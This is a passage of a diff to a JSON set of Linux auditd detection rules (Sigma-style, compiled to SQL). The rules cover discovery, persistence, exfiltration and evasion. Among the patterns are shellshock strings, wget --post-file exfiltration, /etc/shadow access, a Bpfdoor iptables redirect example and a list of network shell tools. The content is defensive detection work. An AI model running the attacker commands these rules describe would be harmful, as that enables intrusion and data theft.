"f34047d9-20d3-4e8b-8672-0a35cc50dc71", + "description": "Detects System Information Discovery commands", "author": "Pawel Mazur", "tags": [ - "attack.persistence", - "attack.t1053.003" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ - "Legitimate modification of crontab" + "Likely" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE logs MATCH ('\"REPLACE\"')" + "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/lsb-release', '/etc/redhat-release', '/etc/issue')) OR (type = 'EXECVE' AND a0 IN ('uname', 'uptime', 'lsmod', 'hostname', 'env')) OR (type = 'EXECVE' AND a0 = 'grep' AND (a1 LIKE '%vbox%' ESCAPE '\\' OR a1 LIKE '%vm%' ESCAPE '\\' OR a1 LIKE '%xen%' ESCAPE '\\' OR a1 LIKE '%virtio%' ESCAPE '\\' OR a1 LIKE '%hv%' ESCAPE '\\')) 
OR (type = 'EXECVE' AND a0 = 'kmod' AND a1 = 'list'))" ], - "filename": "lnx_cron_crontab_file_modification.yml" + "filename": "lnx_auditd_system_info_discovery.yml" }, { - "title": "Sudo Privilege Escalation CVE-2019-14287 - Builtin", - "id": "7fcc54cb-f27d-4684-84b7-436af096f858", - "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "title": "Program Executions in Suspicious Folders", + "id": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", + "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.t1548.003", - "cve.2019.14287" + "attack.t1587", + "attack.t1584", + "attack.resource_development" ], "falsepositives": [ - "Unlikely" + "Admin activity (especially in /tmp folders)", + "Crazy web applications" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (USER LIKE '#-%' ESCAPE '\\' OR USER LIKE '#%4294967295' ESCAPE '\\')" + "SELECT * FROM logs WHERE (type = 'SYSCALL' AND (exe LIKE '/tmp/%' ESCAPE '\\' OR exe LIKE '/var/www/%' ESCAPE '\\' OR exe LIKE '/home/%/public\\_html/%' ESCAPE '\\' OR exe LIKE '/usr/local/apache2/%' ESCAPE '\\' OR exe LIKE '/usr/local/httpd/%' ESCAPE '\\' OR exe LIKE '/var/apache/%' ESCAPE '\\' OR exe LIKE '/srv/www/%' ESCAPE '\\' OR exe LIKE '/home/httpd/html/%' ESCAPE '\\' OR exe LIKE '/srv/http/%' ESCAPE '\\' OR exe LIKE '/usr/share/nginx/html/%' ESCAPE '\\' OR exe LIKE '/var/lib/pgsql/data/%' ESCAPE '\\' OR exe LIKE '/usr/local/mysql/data/%' ESCAPE '\\' OR exe LIKE '/var/lib/mysql/%' ESCAPE '\\' OR exe LIKE '/var/vsftpd/%' ESCAPE '\\' OR exe LIKE '/etc/bind/%' ESCAPE '\\' OR exe LIKE '/var/named/%' ESCAPE '\\'))" ], - "filename": "lnx_sudo_cve_2019_14287_user.yml" + "filename": "lnx_auditd_susp_exe_folders.yml" }, { - "title": "Shellshock Expression", - "id": 
"c67e0c98-4d39-46ee-8f6b-437ebf6b950e", - "description": "Detects shellshock expressions in log files", - "author": "Florian Roth (Nextron Systems)", + "title": "Steganography Unzip Hidden Information From Picture File", + "id": "edd595d7-7895-4fa7-acb3-85a18a8772ca", + "description": "Detects extracting of zip file from image file", + "author": "Pawel Mazur", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1027.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (logs MATCH ('\"(){:;};\" OR \"() {:;};\" OR \"() { :;};\" OR \"() { :; };\"'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'unzip' AND (a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.png' ESCAPE '\\'))" ], - "filename": "lnx_shellshock.yml" + "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml" }, { - "title": "Symlink Etc Passwd", - "id": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", - "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", - "author": "Florian Roth (Nextron Systems)", + "title": "File or Folder Permissions Change", + "id": "74c01ace-0152-4094-8ae2-6fd776dd43e5", + "description": "Detects file and folder permission changes.", + "author": "Jakob Weinzettl, oscd.community", "tags": [ - "attack.t1204.001", - "attack.execution" + "attack.defense_evasion", + "attack.t1222.002" ], "falsepositives": [ - "Unknown" + "User interacting with files permissions (normal/daily behaviour)." 
], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (logs MATCH ('\"ln -s -f /etc/passwd\" OR \"ln -s /etc/passwd\"'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND (a0 LIKE '%chmod%' ESCAPE '\\' OR a0 LIKE '%chown%' ESCAPE '\\'))" ], - "filename": "lnx_symlink_etc_passwd.yml" + "filename": "lnx_auditd_file_or_folder_permissions.yml" }, { - "title": "Code Injection by ld.so Preload", - "id": "7e3c4651-c347-40c4-b1d4-d48590fdf684", - "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", - "author": "Christian Burkard (Nextron Systems)", + "title": "Systemd Service Reload or Start", + "id": "2625cc59-0634-40d0-821e-cb67382a3dd7", + "description": "Detects a reload or a start of a service.", + "author": "Jakob Weinzettl, oscd.community", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.006" + "attack.t1543.002" ], "falsepositives": [ - "Rare temporary workaround for library misconfiguration" + "Installation of legitimate service.", + "Legitimate reconfiguration of service." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE logs MATCH ('\"/etc/ld.so.preload\"')" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%systemctl%' ESCAPE '\\' AND (a1 LIKE '%daemon-reload%' ESCAPE '\\' OR a1 LIKE '%start%' ESCAPE '\\'))" ], - "filename": "lnx_ldso_preload_injection.yml" + "filename": "lnx_auditd_pers_systemd_reload.yml" }, { - "title": "Nimbuspwn Exploitation", - "id": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", - "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", - "author": "Bhabesh Raj", + "title": "Screen Capture with Xwd", + "id": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", + "description": "Detects adversary creating screen capture of a full with xwd. 
Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", + "author": "Pawel Mazur", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Unknown" + "Legitimate use of screenshot utility" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ( = 'networkd-dispatcher' AND = 'Error handling notification for interface' AND = '../../')" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'xwd') AND ((a1 = '-root' AND a2 = '-out' AND a3 LIKE '%.xwd' ESCAPE '\\') OR (a1 = '-out' AND a2 LIKE '%.xwd' ESCAPE '\\')))" ], - "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml" + "filename": "lnx_auditd_screencaputre_xwd.yml" }, { - "title": "Webshell Remote Command Execution", - "id": "c0d3734d-330f-4a03-aae2-65dacc6a8222", - "description": "Detects possible command execution by web application/web shell", - "author": "Ilyas Ochkov, Beyu Denis, oscd.community", + "title": "Disable System Firewall", + "id": "53059bc0-1472-438b-956a-7508a94a91f0", + "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", + "author": "Pawel Mazur", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.t1562.004", + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity", - "Crazy web applications" + "Admin activity" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'SYSCALL' AND syscall = 'execve' AND key LIKE 'detect\\_execve\\_www' ESCAPE '\\')" + "SELECT * FROM logs WHERE (type LIKE 'SERVICE\\_STOP' ESCAPE '\\' AND unit IN ('firewalld', 'iptables', 'ufw'))" ], - "filename": "lnx_auditd_web_rce.yml" + "filename": "lnx_auditd_disable_system_firewall.yml" }, { - "title": "Network Sniffing - Linux", - "id": "f4d3748a-65d1-4806-bd23-e25728081d01", - "description": "Network sniffing refers to using 
the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "author": "Timur Zinniatullin, oscd.community", + "title": "Audio Capture", + "id": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", + "description": "Detects attempts to record audio with arecord utility", + "author": "Pawel Mazur", "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Legitimate administrator or user uses network sniffing tool for legitimate reasons." + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((type = 'execve' AND a0 = 'tcpdump' AND a1 = '-c' AND a3 LIKE '%-i%' ESCAPE '\\') OR (type = 'execve' AND a0 = 'tshark' AND a1 = '-c' AND a3 = '-i'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'arecord' AND a1 = '-vv' AND a2 = '-fdat')" ], - "filename": "lnx_auditd_network_sniffing.yml" + "filename": "lnx_auditd_audio_capture.yml" }, { - "title": "Overwriting the File with Dev Zero or Null", - "id": "37222991-11e9-4b6d-8bdf-60fbe48f753e", - "description": "Detects overwriting (effectively wiping/deleting) of a file.", - "author": "Jakob Weinzettl, oscd.community", + "title": "Screen Capture with Import Tool", + "id": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", + "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", + "author": "Pawel Mazur", "tags": [ - "attack.impact", - "attack.t1485" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Appending null bytes to files.", - "Legitimate overwrite of files." 
+ "Legitimate use of screenshot utility" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%dd%' ESCAPE '\\' AND (a1 LIKE '%if=/dev/null%' ESCAPE '\\' OR a1 LIKE '%if=/dev/zero%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'import') AND ((a1 = '-window' AND a2 = 'root' AND (a3 LIKE '%.png' ESCAPE '\\' OR a3 LIKE '%.jpg' ESCAPE '\\' OR a3 LIKE '%.jpeg' ESCAPE '\\')) OR (a1 LIKE '%.png' ESCAPE '\\' OR a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.jpeg' ESCAPE '\\')))" ], - "filename": "lnx_auditd_dd_delete_file.yml" + "filename": "lnx_auditd_screencapture_import.yml" }, { "title": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd", 
@@ -317,239 +334,240 @@ "filename": "lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" }, { - "title": "Masquerading as Linux Crond Process", - "id": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", - "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", - "author": "Timur Zinniatullin, oscd.community", + "title": "Logging Configuration Changes on Linux Host", + "id": "c830f15d-6f6e-430f-8074-6f73d6807841", + "description": "Detect changes of syslog daemons configuration files", + "author": "Mikhail Larin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.006" ], - "level": "medium", + "falsepositives": [ + "Legitimate administrative activity" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'execve' AND a0 = 'cp' AND a1 = '-i' AND a2 = '/bin/sh' AND a3 LIKE '%/crond' ESCAPE '\\')" + "SELECT * FROM logs WHERE (type = 'PATH' AND name IN ('/etc/syslog.conf', '/etc/rsyslog.conf', '/etc/syslog-ng/syslog-ng.conf'))" ], - "filename": "lnx_auditd_masquerading_crond.yml" + "filename": "lnx_auditd_logging_config_change.yml" }, { - "title": "Linux Capabilities Discovery", - "id": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", - "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", - "author": "Pawel Mazur", + "title": "Bpfdoor TCP Ports Redirect", + "id": "70b4156e-50fc-4523-aa50-c9dddf1993fc", + "description": "All TCP traffic on particular port from attacker is routed to different port. ex. 
'/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", + "author": "Rafal Piasecki", "tags": [ - "attack.collection", - "attack.privilege_escalation", - "attack.t1123", - "attack.t1548" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Unknown" + "Legitimate ports redirect" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'getcap' AND a1 = '-r' AND a2 = '/')" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 LIKE '%iptables' ESCAPE '\\' AND a1 = '-t' AND a2 = 'nat') AND (logs MATCH ('\"--to-ports 42\" OR \"--to-ports 43\"')))" ], - "filename": "lnx_auditd_capabilities_discovery.yml" + "filename": "lnx_auditd_bpfdoor_port_redirect.yml" }, { - "title": "File or Folder Permissions Change", - "id": "74c01ace-0152-4094-8ae2-6fd776dd43e5", - "description": "Detects file and folder permission changes.", - "author": "Jakob Weinzettl, oscd.community", + "title": "Systemd Service Creation", + "id": "1bac86ba-41aa-4f62-9d6b-405eac99b485", + "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", + "author": "Pawel Mazur", "tags": [ - "attack.defense_evasion", - "attack.t1222.002" + "attack.persistence", + "attack.t1543.002" ], "falsepositives": [ - "User interacting with files permissions (normal/daily behaviour)." + "Admin work like legit service installs." 
], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND (a0 LIKE '%chmod%' ESCAPE '\\' OR a0 LIKE '%chown%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((type = 'PATH' AND nametype = 'CREATE') AND ((name LIKE '/usr/lib/systemd/system/%' ESCAPE '\\' OR name LIKE '/etc/systemd/system/%' ESCAPE '\\') OR name LIKE '%/.config/systemd/user/%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_file_or_folder_permissions.yml" + "filename": "lnx_auditd_systemd_service_creation.yml" }, { - "title": "Hidden Files and Directories", - "id": "d08722cd-3d09-449a-80b4-83ea2d9d4616", - "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", - "author": "Pawel Mazur", + "title": "Remove Immutable File Attribute - Auditd", + "id": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", + "description": "Detects removing immutable file attribute.", + "author": "Jakob Weinzettl, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1222.002" ], "falsepositives": [ - "Unknown" + "Administrator interacting with immutable files (e.g. for instance backups)." 
], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 IN ('mkdir', 'touch', 'vim', 'nano', 'vi')) AND (a1 LIKE '%/.%' ESCAPE '\\' OR a1 LIKE '.%' ESCAPE '\\' OR a2 LIKE '%/.%' ESCAPE '\\' OR a2 LIKE '.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%chattr%' ESCAPE '\\' AND a1 LIKE '%-i%' ESCAPE '\\')" ], - "filename": "lnx_auditd_hidden_files_directories.yml" + "filename": "lnx_auditd_chattr_immutable_removal.yml" }, { - "title": "Systemd Service Reload or Start", - "id": "2625cc59-0634-40d0-821e-cb67382a3dd7", - "description": "Detects a reload or a start of a service.", - "author": "Jakob Weinzettl, oscd.community", + "title": "Clipboard Collection with Xclip Tool - Auditd", + "id": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "author": "Pawel Mazur", "tags": [ - "attack.persistence", - "attack.t1543.002" + "attack.collection", + "attack.t1115" ], "falsepositives": [ - "Installation of legitimate service.", - "Legitimate reconfiguration of service." 
+ "Legitimate usage of xclip tools" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%systemctl%' ESCAPE '\\' AND (a1 LIKE '%daemon-reload%' ESCAPE '\\' OR a1 LIKE '%start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'xclip' AND a1 IN ('-selection', '-sel') AND a2 IN ('clipboard', 'clip') AND a3 = '-o')" ], - "filename": "lnx_auditd_pers_systemd_reload.yml" + "filename": "lnx_auditd_clipboard_collection.yml" }, { - "title": "Logging Configuration Changes on Linux Host", - "id": "c830f15d-6f6e-430f-8074-6f73d6807841", - "description": "Detect changes of syslog daemons configuration files", - "author": "Mikhail Larin, oscd.community", + "title": "Modification of ld.so.preload", + "id": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", + "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.006" + "attack.t1574.006" ], "falsepositives": [ - "Legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND name IN ('/etc/syslog.conf', '/etc/rsyslog.conf', '/etc/syslog-ng/syslog-ng.conf'))" + "SELECT * FROM logs WHERE (type = 'PATH' AND name = '/etc/ld.so.preload')" ], - "filename": "lnx_auditd_logging_config_change.yml" + "filename": "lnx_auditd_ld_so_preload_mod.yml" }, { - "title": "Remove Immutable File Attribute - Auditd", - "id": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", - "description": "Detects removing immutable file attribute.", - "author": "Jakob Weinzettl, oscd.community", + "title": "Split A File Into Pieces - Linux", + "id": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "author": "Igor 
Fits, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1222.002" + "attack.exfiltration", + "attack.t1030" ], "falsepositives": [ - "Administrator interacting with immutable files (e.g. for instance backups)." + "Legitimate administrative activity" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%chattr%' ESCAPE '\\' AND a1 LIKE '%-i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (type = 'SYSCALL' AND comm = 'split')" ], - "filename": "lnx_auditd_chattr_immutable_removal.yml" + "filename": "lnx_auditd_split_file_into_pieces.yml" }, { - "title": "Audio Capture", - "id": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", - "description": "Detects attempts to record audio with arecord utility", + "title": "Data Exfiltration with Wget", + "id": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", + "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", "author": "Pawel Mazur", "tags": [ - "attack.collection", - "attack.t1123" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Unknown" + "Legitimate usage of wget utility to post a file" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'arecord' AND a1 = '-vv' AND a2 = '-fdat')" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'wget' AND a1 LIKE '--post-file=%' ESCAPE '\\')" ], - "filename": "lnx_auditd_audio_capture.yml" + "filename": "lnx_auditd_data_exfil_wget.yml" }, { - "title": "Use Of Hidden Paths Or Files", - "id": "9e1bef8d-0fff-46f6-8465-9aa54e128c1e", - "description": "Detects calls to hidden files or files located in hidden directories in NIX systems.", - "author": "David Burkett, @signalblur", + "title": "Linux Capabilities Discovery", + "id": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", + 
"description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", + "author": "Pawel Mazur", "tags": [ - "attack.defense_evasion", - "attack.t1574.001" + "attack.collection", + "attack.privilege_escalation", + "attack.t1123", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((type = 'PATH' AND name LIKE '%/.%' ESCAPE '\\') AND NOT ((name LIKE '%/.cache/%' ESCAPE '\\' OR name LIKE '%/.config/%' ESCAPE '\\' OR name LIKE '%/.pyenv/%' ESCAPE '\\' OR name LIKE '%/.rustup/toolchains%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'getcap' AND a1 = '-r' AND a2 = '/')" ], - "filename": "lnx_auditd_hidden_binary_execution.yml" + "filename": "lnx_auditd_capabilities_discovery.yml" }, { - "title": "Steganography Unzip Hidden Information From Picture File", - "id": "edd595d7-7895-4fa7-acb3-85a18a8772ca", - "description": "Detects extracting of zip file from image file", + "title": "Clipboard Collection of Image Data with Xclip Tool", + "id": "f200dc3f-b219-425d-a17e-c38467364816", + "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", "author": "Pawel Mazur", "tags": [ - "attack.defense_evasion", - "attack.t1027.003" + "attack.collection", + "attack.t1115" ], "falsepositives": [ - "Unknown" + "Legitimate usage of xclip tools" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'unzip' AND (a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.png' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'xclip' AND a1 IN ('-selection', '-sel') AND a2 IN ('clipboard', 'clip') AND a3 = '-t' AND a4 LIKE 'image/%' ESCAPE '\\' AND a5 = '-o')" ], - "filename": 
"lnx_auditd_unzip_hidden_zip_files_steganography.yml" + "filename": "lnx_auditd_clipboard_image_collection.yml" }, { - "title": "CVE-2021-3156 Exploitation Attempt", - "id": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", - "author": "Bhabesh Raj", + "title": "Loading of Kernel Module via Insmod", + "id": "106d7cbd-80ff-4985-b682-a7043e5acb72", + "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", + "author": "Pawel Mazur", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" + "attack.t1547.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM (SELECT *,count(*) AS agg FROM logs WHERE ((type = 'EXECVE' AND a0 = '/usr/bin/sudoedit') AND (a1 = '-s' OR a2 = '-s' OR a3 = '-s' OR a4 = '-s') AND (a1 LIKE '\\\\' ESCAPE '\\' OR a2 LIKE '\\\\' ESCAPE '\\' OR a3 LIKE '\\\\' ESCAPE '\\' OR a4 LIKE '\\\\' ESCAPE '\\')) GROUP BY host) WHERE agg > 50" + "SELECT * FROM logs WHERE (type = 'SYSCALL' AND comm = 'insmod' AND exe = '/usr/bin/kmod')" ], - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" + "filename": "lnx_auditd_load_module_insmod.yml" }, { - "title": "Steganography Hide Zip Information in Picture File", - "id": "45810b50-7edc-42ca-813b-bdac02fb946b", - "description": "Detects appending of zip file to image", - "author": "Pawel Mazur", + "title": "Suspicious C2 Activities", + "id": "f7158a64-6204-4d6d-868a-6e6378b467e0", + "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd 
Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n", + "author": "Marie Euler", "tags": [ - "attack.defense_evasion", - "attack.t1027.003" + "attack.command_and_control" ], "falsepositives": [ - "Unknown" + "Admin or User activity" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'cat' AND (a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.png' ESCAPE '\\') AND a2 LIKE '%.zip' ESCAPE '\\')" + "SELECT * FROM logs WHERE key LIKE 'susp\\_activity' ESCAPE '\\'" ], - "filename": "lnx_auditd_hidden_zip_files_steganography.yml" + "filename": "lnx_auditd_susp_c2_commands.yml" }, { - "title": "Suspicious Commands Linux", - "id": "1543ae20-cbdf-4ec1-8d12-7664d667a825", - "description": "Detects relevant commands often related to malware or hacking activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Hidden Files and Directories", + "id": "d08722cd-3d09-449a-80b4-83ea2d9d4616", + "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . 
as the first character", + "author": "Pawel Mazur", "tags": [ - "attack.execution", - "attack.t1059.004" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Admin activity" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'chmod' AND a1 = '777') OR (type = 'EXECVE' AND a0 = 'chmod' AND a1 = 'u+s') OR (type = 'EXECVE' AND a0 = 'cp' AND a1 = '/bin/ksh') OR (type = 'EXECVE' AND a0 = 'cp' AND a1 = '/bin/sh'))" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 IN ('mkdir', 'touch', 'vim', 'nano', 'vi')) AND (a1 LIKE '%/.%' ESCAPE '\\' OR a1 LIKE '.%' ESCAPE '\\' OR a2 LIKE '%/.%' ESCAPE '\\' OR a2 LIKE '.%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_susp_cmds.yml" + "filename": "lnx_auditd_hidden_files_directories.yml" }, { "title": "System Owner or User Discovery", 
@@ -570,78 +588,77 @@ "filename": "lnx_auditd_user_discovery.yml" }, { - "title": "Linux Keylogging with Pam.d", - "id": "49aae26c-450e-448b-911d-b3c13d178dfc", - "description": "Detect attempt to enable auditing of TTY input", - "author": "Pawel Mazur", + "title": "Network Sniffing - Linux", + "id": "f4d3748a-65d1-4806-bd23-e25728081d01", + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.credential_access", - "attack.t1003", - "attack.t1056.001" + "attack.discovery", + "attack.t1040" ], "falsepositives": [ - "Administrative work" + "Legitimate administrator or user uses network sniffing tool for legitimate reasons." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/pam.d/system-auth', '/etc/pam.d/password-auth')) OR (type LIKE 'TTY' ESCAPE '\\' OR type LIKE 'USER\\_TTY' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((type = 'execve' AND a0 = 'tcpdump' AND a1 = '-c' AND a3 LIKE '%-i%' ESCAPE '\\') OR (type = 'execve' AND a0 = 'tshark' AND a1 = '-c' AND a3 = '-i'))" ], - "filename": "lnx_auditd_keylogging_with_pam_d.yml" + "filename": "lnx_auditd_network_sniffing.yml" }, { - "title": "System Information Discovery - Auditd", - "id": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", - "description": "Detects System Information Discovery commands", - "author": "Pawel Mazur", + "title": "Possible Coin Miner CPU Priority Param", + "id": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", + "description": "Detects command line parameter very often used with coin miners", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1082" + 
"attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Likely" + "Other tools that use a --cpu-priority flag" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/lsb-release', '/etc/redhat-release', '/etc/issue')) OR (type = 'EXECVE' AND a0 IN ('uname', 'uptime', 'lsmod', 'hostname', 'env')) OR (type = 'EXECVE' AND a0 = 'grep' AND (a1 LIKE '%vbox%' ESCAPE '\\' OR a1 LIKE '%vm%' ESCAPE '\\' OR a1 LIKE '%xen%' ESCAPE '\\' OR a1 LIKE '%virtio%' ESCAPE '\\' OR a1 LIKE '%hv%' ESCAPE '\\')) OR (type = 'EXECVE' AND a0 = 'kmod' AND a1 = 'list'))" + "SELECT * FROM logs WHERE (a1 LIKE '--cpu-priority%' ESCAPE '\\' OR a2 LIKE '--cpu-priority%' ESCAPE '\\' OR a3 LIKE '--cpu-priority%' ESCAPE '\\' OR a4 LIKE '--cpu-priority%' ESCAPE '\\' OR a5 LIKE '--cpu-priority%' ESCAPE '\\' OR a6 LIKE '--cpu-priority%' ESCAPE '\\' OR a7 LIKE '--cpu-priority%' ESCAPE '\\')" ], - "filename": 